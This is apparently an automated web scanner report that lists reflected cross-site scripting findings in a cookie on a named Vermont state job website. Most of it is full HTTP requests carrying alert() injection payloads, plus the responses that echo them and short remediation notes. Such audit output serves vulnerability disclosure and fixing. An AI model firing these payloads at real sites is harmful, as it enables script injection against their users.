Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en6398b"><img src=a onerror=alert(1)>ba3c68b365f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d0cc"%3balert(1)//58328ab40e9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 3d0cc";alert(1)//58328ab40e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)//58328ab40e9; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)//58328AB40E9\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as acbaa"><img src=a onerror=alert(1)>ae5b7c5d919 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:31 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enacbaa"><img src=a onerror=alert(1)>ae5b7c5d919"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d941"%3balert(1)//bf7542d8709 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 4d941";alert(1)//bf7542d8709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)//bf7542d8709; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:39 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN4D941";ALERT(1)//BF7542D8709\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a13a7"%3balert(1)//00ccd787efa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as a13a7";alert(1)//00ccd787efa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=ena13a7"%3balert(1)//00ccd787efa
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA13A7";ALERT(1)//00CCD787EFA\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 73b71"><img src=a onerror=alert(1)>4f618c7f396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:46 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en73b71"><img src=a onerror=alert(1)>4f618c7f396"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8806"%3balert(1)//e2594ad7f76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8806";alert(1)//e2594ad7f76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb8806"%3balert(1)//e2594ad7f76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:17 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8806";ALERT(1)//E2594AD7F76\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60b78"><img src=a onerror=alert(1)>26d42412b51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60b78"><img src=a onerror=alert(1)>26d42412b51"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e46b"%3balert(1)//47870d01fcb was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e46b";alert(1)//47870d01fcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en7e46b"%3balert(1)//47870d01fcb; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
